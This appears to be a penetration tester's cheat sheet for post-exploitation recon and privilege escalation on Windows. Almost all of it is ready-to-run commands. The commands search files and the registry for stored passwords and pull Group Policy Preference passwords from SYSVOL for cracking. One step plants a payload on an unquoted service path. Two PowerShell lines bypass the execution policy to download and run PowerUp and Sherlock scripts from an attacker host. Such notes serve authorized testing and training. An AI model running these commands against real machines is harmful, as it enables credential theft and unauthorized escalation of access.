Windows enumeration

Manual post exploitation recon for windows targets

#Basics

#systeminfo
hostname

# Who am I?
whoami
echo %username%

# What users/localgroups are on the machine?
net users
net localgroups

# More info about a specific user. Check if user has privileges.
net user user1

# View Domain Groups
net group /domain

# View Members of Domain Group
net group /domain <Group Name>

# Firewall
netsh firewall show state
netsh firewall show config

# Network
ipconfig /all
route print
arp -A

# How well patched is the system?
wmic qfe get Caption,Description,HotFixID,InstalledOn

#Cleartext passwords

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*

# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*

#Passwords in files

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini

#Passwords in registry

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

#Checking for Kernel exploits

systeminfo
# or
wmic qfe get Caption,Description,HotFixID,InstalledOn

#Scheduled tasks

schtasks /query /fo LIST /v

#Weak service permissions

#will spit out a ton of output

wmic service list brief

#To prune the output into something more manageable,leverage wimc and icalcs 
from C:\Windows\temp  | try:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt

Then:

for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

#sc.exe

sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt

FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt

FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt

FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

#Unquoted service paths:If the path contains a space and is not quoted,the service is vulnerable.

# Using WMIC
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

# Using sc
sc query
sc qc service name

# Look for Binary_path_name and see if it is unquoted.

#Example of an unquoted executable:
c:\Program Files\something\winamp.exe

#We can place a payload like this: 

c:\evil.exe

#There is also a metasploit module: 
exploit/windows/local/trusted_service_path

#Check for vulnerable drivers

# List all drivers
driverquery

#Group policy preferences

# Output environment-variables
set

# Look for the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=EXAMPLE.LOCAL

# Look up ip-addres
nslookup nameofserver.example.local

# It will output something like this
Address:  192.168.1.101

# Now you can mount it
net use z: \\192.168.1.101\SYSVOL

# Enter
z:

# Now search for the groups.xml file
dir Groups.xml /s

#If an encrypted password is found , exfile to kali and crack:

gpp-decrypt encryptedpassword

#Pint test blind RCE

C:\Windows\System32\cmd.exe /c ping 10.10.10.10
# on linux box: 
tcpdump -i tun0 icmp

#Same if powershell is available

C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe ping 10.10.10.10

#Firewall / AV / Defender

netsh firewall show state  
netsh firewall show config  
Sc query windefend
Netsh advfirewall firewall dump, netsh firewall show state

#Automated tools checklist

#Run winpeas 
Run PowerUp.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerUp.ps1');Invoke-AllChecks"

#Run Sherlock.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Sherlock.ps1');Find-AllVulns"

#Run JAWS

# Executables  
WinPEAS.exe /.bat * 
Seatbelt.exe 
Watson.exe * 
Sharpup.exe 
windows-privesc-check2.exe --dump -G

#Powershell 
Sherlock.ps1 * 
PowerUp.ps1 * 
jaws-enumps1 * 


#Other 
Windows-exploit-suggester.py *
Systeminfo -> a text file and run it with windows exploit suggester.py, search for exploit in SecWiki github 

MSF exploit suggester *
In a meterpreter session – run /post/multi/recon/local_exploit_suggester - > shows list of kernel

Previous'Nix file transfers NextAutomated scripts

Last updated 3 years ago